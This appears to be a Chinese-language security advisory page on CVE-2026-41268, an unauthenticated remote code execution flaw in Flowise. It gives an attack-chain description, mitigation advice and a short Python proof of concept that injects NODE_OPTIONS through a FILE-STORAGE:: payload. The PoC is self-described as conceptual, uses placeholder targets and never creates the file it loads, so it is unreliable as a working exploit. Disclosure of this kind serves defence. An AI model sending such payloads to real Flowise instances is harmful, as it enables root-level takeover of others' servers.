CVE-2026-41268 CVSS 9.8 严重

CVE-2026-41268 Flowise未授权远程代码执行漏洞

披露日期: 2026-04-23

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-41268

漏洞类型

远程代码执行

CVSS评分

9.8 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Flowise

漏洞概述

Flowise是一个用于构建定制化大语言模型流程的拖拽式用户界面。在3.1.0版本之前，Flowise存在一个严重的未认证远程代码执行（RCE）漏洞。攻击者可以通过利用FILE-STORAGE::关键字结合NODE_OPTIONS环境变量注入来绕过参数覆盖限制。该漏洞允许攻击者在无需身份验证或了解实例具体信息的情况下，仅通过单个HTTP请求即可在容器化的Flowise实例中以root权限执行任意系统命令。该漏洞已在3.1.0版本中修复。

技术细节

该漏洞源于Flowise在处理特定参数时的逻辑缺陷，允许攻击者进行参数覆盖攻击。漏洞的核心利用机制涉及两个关键步骤：首先，利用FILE-STORAGE::关键字触发特定的文件处理逻辑或解析路径，从而绕过原有的安全校验机制；其次，通过注入恶意的NODE_OPTIONS环境变量，攻击者可以控制Node.js进程的启动参数。由于Node.js在启动时会读取NODE_OPTIONS环境变量，攻击者可以注入--require参数来加载并执行恶意的JavaScript代码。这种环境变量注入技术最终导致了未认证的远程代码执行。由于Flowise通常运行在容器化环境中，且进程往往以高权限（如root）运行，因此攻击者成功利用后可以获得容器的完全控制权。整个攻击过程无需用户交互，也不需要任何身份凭证，利用门槛极低，危害极大。

攻击链分析

STEP 1

侦察

攻击者识别互联网上暴露的Flowise实例服务。

STEP 2

构造攻击载荷

攻击者构造包含FILE-STORAGE::关键字的恶意数据包，并注入NODE_OPTIONS环境变量参数。

STEP 3

发送请求

攻击者向Flowise API端点发送单个特制的HTTP请求，无需身份验证。

STEP 4

执行命令

服务器端解析请求，应用环境变量注入，Node.js进程加载并执行恶意代码，实现RCE。

STEP 5

获取控制权

攻击者获得容器内的root权限Shell，完全控制受影响实例。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import json

# PoC for CVE-2026-41268
# This script demonstrates the concept of exploiting the Flowise RCE
# via FILE-STORAGE:: keyword and NODE_OPTIONS injection.

target_url = "http://<target-ip>:3000/api/v1/prediction/xxx" 

# The payload utilizes the FILE-STORAGE:: keyword to trigger the override
# and injects NODE_OPTIONS to execute arbitrary code.
payload = {
    "nodes": [
        {
            "id": "test-node",
            "data": {
                "type": "FILE-STORAGE::",
                "filePath": "/tmp/malicious.js",
                "env": {
                    "NODE_OPTIONS": "--require=/tmp/malicious.js"
                }
            }
        }
    ]
}

headers = {
    "Content-Type": "application/json"
}

try:
    # Sending the malicious request
    response = requests.post(target_url, data=json.dumps(payload), headers=headers)
    print(f"Status Code: {response.status_code}")
    print(f"Response: {response.text}")
except Exception as e:
    print(f"Error: {e}")

影响范围

Flowise < 3.1.0

防御指南

临时缓解措施

建议立即检查Flowise版本，若低于3.1.0则必须进行升级。在升级前，应将服务部署在内网并配置严格的访问控制策略，禁止未授权IP访问。同时，避免使用root用户运行容器，以降低提权风险。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表